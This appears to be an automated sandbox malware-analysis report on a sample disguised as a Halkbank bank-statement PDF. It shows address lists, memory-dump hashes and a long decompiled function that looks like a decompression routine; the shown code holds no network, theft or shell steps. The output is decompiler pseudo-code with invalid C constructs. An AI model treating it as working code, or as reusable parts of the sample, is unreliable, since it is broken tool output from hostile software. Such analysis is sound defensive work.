                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00407321
                                                                    0x00407234
                                                                    0x00407237
                                                                    0x00407239
                                                                    0x0040723c
                                                                    0x0040723f
                                                                    0x00407242
                                                                    0x00407244
                                                                    0x00407247
                                                                    0x0040724a
                                                                    0x0040724a
                                                                    0x0040724d
                                                                    0x0040724d
                                                                    0x00407250
                                                                    0x00407257
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00407257
                                                                    0x004071dd
                                                                    0x004071e0
                                                                    0x004071e2
                                                                    0x004071e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f44
                                                                    0x00406f44
                                                                    0x00406f48
                                                                    0x0040758d
                                                                    0x00000000
                                                                    0x0040758d
                                                                    0x00406f4e
                                                                    0x00406f51
                                                                    0x00406f54
                                                                    0x00406f57
                                                                    0x00406f5a
                                                                    0x00406f5d
                                                                    0x00406f60
                                                                    0x00406f62
                                                                    0x00406f65
                                                                    0x00406f68
                                                                    0x00406f6b
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070cf
                                                                    0x004070cf
                                                                    0x004070d3
                                                                    0x00407599
                                                                    0x00000000
                                                                    0x00407599
                                                                    0x004070d9
                                                                    0x004070dc
                                                                    0x004070df
                                                                    0x004070e2
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e7
                                                                    0x004070ea
                                                                    0x004070ed
                                                                    0x004070f0
                                                                    0x004070f3
                                                                    0x004070f6
                                                                    0x004070f7
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070fc
                                                                    0x004070ff
                                                                    0x00407102
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407108
                                                                    0x0040710a
                                                                    0x0040710a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x00407350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407356
                                                                    0x00407359
                                                                    0x0040735c
                                                                    0x0040735f
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407364
                                                                    0x00407367
                                                                    0x0040736a
                                                                    0x0040736d
                                                                    0x00407370
                                                                    0x00407373
                                                                    0x00407374
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407379
                                                                    0x0040737c
                                                                    0x0040737f
                                                                    0x00407382
                                                                    0x00407385
                                                                    0x00407389
                                                                    0x0040738b
                                                                    0x0040738e
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x00000000
                                                                    0x0040710d
                                                                    0x0040738e
                                                                    0x004075c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x004075fa
                                                                    0x004075fa
                                                                    0x00000000
                                                                    0x004075fa
                                                                    0x00407447
                                                                    0x004073ce
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x00407120

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                    • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                    • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                    • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E00407068() {
                                                                    				unsigned short _t531;
                                                                    				signed int _t532;
                                                                    				void _t533;
                                                                    				signed int _t534;
                                                                    				signed int _t535;
                                                                    				signed int _t565;
                                                                    				signed int _t568;
                                                                    				signed int _t589;
                                                                    				signed int* _t606;
                                                                    				void* _t613;
                                                                    
                                                                    				L0:
                                                                    				while(1) {
                                                                    					L0:
                                                                    					if( *(_t613 - 0x40) != 0) {
                                                                    						 *(_t613 - 0x84) = 0xa;
                                                                    						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                    					} else {
                                                                    						 *(__ebp - 0x84) = 9;
                                                                    						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                    					}
                                                                    					while(1) {
                                                                    						 *(_t613 - 0x54) = _t606;
                                                                    						while(1) {
                                                                    							L133:
                                                                    							_t531 =  *_t606;
                                                                    							_t589 = _t531 & 0x0000ffff;
                                                                    							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                    							if( *(_t613 - 0xc) >= _t565) {
                                                                    								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                    								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                    								 *(_t613 - 0x40) = 1;
                                                                    								_t532 = _t531 - (_t531 >> 5);
                                                                    								 *_t606 = _t532;
                                                                    							} else {
                                                                    								 *(_t613 - 0x10) = _t565;
                                                                    								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                    								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                    							}
                                                                    							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                    								goto L139;
                                                                    							}
                                                                    							L137:
                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                    								 *(_t613 - 0x88) = 5;
                                                                    								L170:
                                                                    								_t568 = 0x22;
                                                                    								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                    								_t535 = 0;
                                                                    								L172:
                                                                    								return _t535;
                                                                    							}
                                                                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                    							L139:
                                                                    							_t533 =  *(_t613 - 0x84);
                                                                    							while(1) {
                                                                    								 *(_t613 - 0x88) = _t533;
                                                                    								while(1) {
                                                                    									L1:
                                                                    									_t534 =  *(_t613 - 0x88);
                                                                    									if(_t534 > 0x1c) {
                                                                    										break;
                                                                    									}
                                                                    									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                    										case 0:
                                                                    											if( *(_t613 - 0x6c) == 0) {
                                                                    												goto L170;
                                                                    											}
                                                                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                    											_t534 =  *( *(_t613 - 0x70));
                                                                    											if(_t534 > 0xe1) {
                                                                    												goto L171;
                                                                    											}
                                                                    											_t538 = _t534 & 0x000000ff;
                                                                    											_push(0x2d);
                                                                    											asm("cdq");
                                                                    											_pop(_t570);
                                                                    											_push(9);
                                                                    											_pop(_t571);
                                                                    											_t609 = _t538 / _t570;
                                                                    											_t540 = _t538 % _t570 & 0x000000ff;
                                                                    											asm("cdq");
                                                                    											_t604 = _t540 % _t571 & 0x000000ff;
                                                                    											 *(_t613 - 0x3c) = _t604;
                                                                    											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                    											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                    											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                    											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                    												L10:
                                                                    												if(_t612 == 0) {
                                                                    													L12:
                                                                    													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                    													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                    													goto L15;
                                                                    												} else {
                                                                    													goto L11;
                                                                    												}
                                                                    												do {
                                                                    													L11:
                                                                    													_t612 = _t612 - 1;
                                                                    													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                    												} while (_t612 != 0);
                                                                    												goto L12;
                                                                    											}
                                                                    											if( *(_t613 - 4) != 0) {
                                                                    												GlobalFree( *(_t613 - 4));
                                                                    											}
                                                                    											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                    											 *(_t613 - 4) = _t534;
                                                                    											if(_t534 == 0) {
                                                                    												goto L171;
                                                                    											} else {
                                                                    												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                    												goto L10;
                                                                    											}
                                                                    										case 1:
                                                                    											L13:
                                                                    											__eflags =  *(_t613 - 0x6c);
                                                                    											if( *(_t613 - 0x6c) == 0) {
                                                                    												 *(_t613 - 0x88) = 1;
                                                                    												goto L170;
                                                                    											}
                                                                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                    											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                    											_t45 = _t613 - 0x48;
                                                                    											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                    											__eflags =  *_t45;
                                                                    											L15:
                                                                    											if( *(_t613 - 0x48) < 4) {
                                                                    												goto L13;
                                                                    											}
                                                                    											_t546 =  *(_t613 - 0x40);
                                                                    											if(_t546 ==  *(_t613 - 0x74)) {
                                                                    												L20:
                                                                    												 *(_t613 - 0x48) = 5;
                                                                    												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                    												goto L23;
                                                                    											}
                                                                    											 *(_t613 - 0x74) = _t546;
                                                                    											if( *(_t613 - 8) != 0) {
                                                                    												GlobalFree( *(_t613 - 8));
                                                                    											}
                                                                    											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                    											 *(_t613 - 8) = _t534;
                                                                    											if(_t534 == 0) {
                                                                    												goto L171;
                                                                    											} else {
                                                                    												goto L20;
                                                                    											}
                                                                    										case 2:
                                                                    											L24:
                                                                    											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                    											 *(_t613 - 0x84) = 6;
                                                                    											 *(_t613 - 0x4c) = _t553;
                                                                    											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                    											 *(_t613 - 0x54) = _t606;
                                                                    											goto L133;
                                                                    										case 3:
                                                                    											L21:
                                                                    											__eflags =  *(_t613 - 0x6c);
                                                                    											if( *(_t613 - 0x6c) == 0) {
                                                                    												 *(_t613 - 0x88) = 3;
                                                                    												goto L170;
                                                                    											}
                                                                    											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                    											_t67 = _t613 - 0x70;
                                                                    											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                    											__eflags =  *_t67;
                                                                    											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                    											L23:
                                                                    											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                    											if( *(_t613 - 0x48) != 0) {
                                                                    												goto L21;
                                                                    											}
                                                                    											goto L24;
                                                                    										case 4:
                                                                    											L133:
                                                                    											_t531 =  *_t606;
                                                                    											_t589 = _t531 & 0x0000ffff;
                                                                    											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                    											if( *(_t613 - 0xc) >= _t565) {
                                                                    												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                    												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                    												 *(_t613 - 0x40) = 1;
                                                                    												_t532 = _t531 - (_t531 >> 5);
                                                                    												 *_t606 = _t532;
                                                                    											} else {
                                                                    												 *(_t613 - 0x10) = _t565;
                                                                    												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                    												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                    											}
                                                                    											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                    												goto L139;
                                                                    											}
                                                                    										case 5:
                                                                    											goto L137;
                                                                    										case 6:
                                                                    											__edx = 0;
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__ecx =  *(__ebp - 0x38);
                                                                    												 *(__ebp - 0x34) = 1;
                                                                    												 *(__ebp - 0x84) = 7;
                                                                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                    												while(1) {
                                                                    													 *(_t613 - 0x54) = _t606;
                                                                    													goto L133;
                                                                    												}
                                                                    											}
                                                                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                    											__esi =  *(__ebp - 0x60);
                                                                    											__cl = 8;
                                                                    											__cl = 8 -  *(__ebp - 0x3c);
                                                                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                    											__ecx =  *(__ebp - 0x3c);
                                                                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                    											__ecx =  *(__ebp - 4);
                                                                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                    											__eflags =  *(__ebp - 0x38) - 4;
                                                                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    											if( *(__ebp - 0x38) >= 4) {
                                                                    												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                    												if( *(__ebp - 0x38) >= 0xa) {
                                                                    													_t98 = __ebp - 0x38;
                                                                    													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                    													__eflags =  *_t98;
                                                                    												} else {
                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                    												}
                                                                    											} else {
                                                                    												 *(__ebp - 0x38) = 0;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x34) - __edx;
                                                                    											if( *(__ebp - 0x34) == __edx) {
                                                                    												__ebx = 0;
                                                                    												__ebx = 1;
                                                                    												goto L61;
                                                                    											} else {
                                                                    												__eax =  *(__ebp - 0x14);
                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                    													__eflags = __eax;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 8);
                                                                    												__ebx = 0;
                                                                    												__ebx = 1;
                                                                    												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                    												goto L41;
                                                                    											}
                                                                    										case 7:
                                                                    											__eflags =  *(__ebp - 0x40) - 1;
                                                                    											if( *(__ebp - 0x40) != 1) {
                                                                    												__eax =  *(__ebp - 0x24);
                                                                    												 *(__ebp - 0x80) = 0x16;
                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    												__eax =  *(__ebp - 0x28);
                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    												__eax =  *(__ebp - 0x2c);
                                                                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    												__eax = 0;
                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    												__al = __al & 0x000000fd;
                                                                    												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__eax =  *(__ebp - 4) + 0x664;
                                                                    												__eflags = __eax;
                                                                    												 *(__ebp - 0x58) = __eax;
                                                                    												goto L69;
                                                                    											}
                                                                    											__eax =  *(__ebp - 4);
                                                                    											__ecx =  *(__ebp - 0x38);
                                                                    											 *(__ebp - 0x84) = 8;
                                                                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                    											while(1) {
                                                                    												 *(_t613 - 0x54) = _t606;
                                                                    												goto L133;
                                                                    											}
                                                                    										case 8:
                                                                    											goto L0;
                                                                    										case 9:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												goto L89;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x60);
                                                                    											if( *(__ebp - 0x60) == 0) {
                                                                    												goto L171;
                                                                    											}
                                                                    											__eax = 0;
                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                    											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                    											__eflags = _t258;
                                                                    											0 | _t258 = _t258 + _t258 + 9;
                                                                    											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                    											goto L75;
                                                                    										case 0xa:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__ecx =  *(__ebp - 0x38);
                                                                    												 *(__ebp - 0x84) = 0xb;
                                                                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                    												while(1) {
                                                                    													 *(_t613 - 0x54) = _t606;
                                                                    													goto L133;
                                                                    												}
                                                                    											}
                                                                    											__eax =  *(__ebp - 0x28);
                                                                    											goto L88;
                                                                    										case 0xb:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												__ecx =  *(__ebp - 0x24);
                                                                    												__eax =  *(__ebp - 0x20);
                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    											} else {
                                                                    												__eax =  *(__ebp - 0x24);
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x28);
                                                                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    											L88:
                                                                    											__ecx =  *(__ebp - 0x2c);
                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    											L89:
                                                                    											__eax =  *(__ebp - 4);
                                                                    											 *(__ebp - 0x80) = 0x15;
                                                                    											__eax =  *(__ebp - 4) + 0xa68;
                                                                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                    											goto L69;
                                                                    										case 0xc:
                                                                    											L99:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0xc;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t334 = __ebp - 0x70;
                                                                    											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t334;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											__eax =  *(__ebp - 0x2c);
                                                                    											goto L101;
                                                                    										case 0xd:
                                                                    											L37:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0xd;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t122 = __ebp - 0x70;
                                                                    											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t122;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											L39:
                                                                    											__eax =  *(__ebp - 0x40);
                                                                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                    												goto L48;
                                                                    											}
                                                                    											__eflags = __ebx - 0x100;
                                                                    											if(__ebx >= 0x100) {
                                                                    												goto L54;
                                                                    											}
                                                                    											L41:
                                                                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                    											__ecx =  *(__ebp - 0x58);
                                                                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                    											 *(__ebp - 0x48) = __eax;
                                                                    											__eax = __eax + 1;
                                                                    											__eax = __eax << 8;
                                                                    											__eax = __eax + __ebx;
                                                                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    											__ax =  *__esi;
                                                                    											 *(__ebp - 0x54) = __esi;
                                                                    											__edx = __ax & 0x0000ffff;
                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    												__cx = __ax;
                                                                    												 *(__ebp - 0x40) = 1;
                                                                    												__cx = __ax >> 5;
                                                                    												__eflags = __eax;
                                                                    												__ebx = __ebx + __ebx + 1;
                                                                    												 *__esi = __ax;
                                                                    											} else {
                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                    												0x800 = 0x800 - __edx;
                                                                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                    												__ebx = __ebx + __ebx;
                                                                    												 *__esi = __cx;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    												goto L39;
                                                                    											} else {
                                                                    												goto L37;
                                                                    											}
                                                                    										case 0xe:
                                                                    											L46:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0xe;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t156 = __ebp - 0x70;
                                                                    											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t156;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											while(1) {
                                                                    												L48:
                                                                    												__eflags = __ebx - 0x100;
                                                                    												if(__ebx >= 0x100) {
                                                                    													break;
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x58);
                                                                    												__edx = __ebx + __ebx;
                                                                    												__ecx =  *(__ebp - 0x10);
                                                                    												__esi = __edx + __eax;
                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    												__ax =  *__esi;
                                                                    												 *(__ebp - 0x54) = __esi;
                                                                    												__edi = __ax & 0x0000ffff;
                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    													__cx = __ax;
                                                                    													_t170 = __edx + 1; // 0x1
                                                                    													__ebx = _t170;
                                                                    													__cx = __ax >> 5;
                                                                    													__eflags = __eax;
                                                                    													 *__esi = __ax;
                                                                    												} else {
                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                    													0x800 = 0x800 - __edi;
                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    													__ebx = __ebx + __ebx;
                                                                    													 *__esi = __cx;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    													continue;
                                                                    												} else {
                                                                    													goto L46;
                                                                    												}
                                                                    											}
                                                                    											L54:
                                                                    											_t173 = __ebp - 0x34;
                                                                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                    											__eflags =  *_t173;
                                                                    											goto L55;
                                                                    										case 0xf:
                                                                    											L58:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												 *(__ebp - 0x88) = 0xf;
                                                                    												goto L170;
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t203 = __ebp - 0x70;
                                                                    											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t203;
